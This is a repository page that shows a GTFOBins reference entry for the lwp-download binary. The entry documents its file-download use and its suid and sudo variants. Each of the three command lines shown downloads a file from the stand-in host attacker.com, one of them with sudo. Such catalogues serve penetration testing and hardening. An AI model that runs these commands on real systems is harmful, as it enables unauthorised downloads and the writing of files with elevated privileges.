This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
14e39abd7e55d2014d5eaaefe0d4f38c8431e7a7
GTFOBins.github.io
/
_gtfobins
/
lwp-download.md
Andrea Cardaci
45308d4f58
Remove some useless instances of export
2020-06-10 23:04:59 +02:00
468 B
Raw
Blame
History
description, functions
description
functions
Fetch a remote file via HTTP GET request.
file-download
suid
sudo
code
URL=
http://attacker.com/file_to_get
LFILE=file_to_save lwp-download $URL $LFILE
code
URL=
http://attacker.com/file_to_get
LFILE=file_to_save ./lwp-download $URL $LFILE
code
URL=
http://attacker.com/file_to_get
LFILE=file_to_save sudo lwp-download $URL $LFILE
Reference in New Issue
View Git Blame
Copy Permalink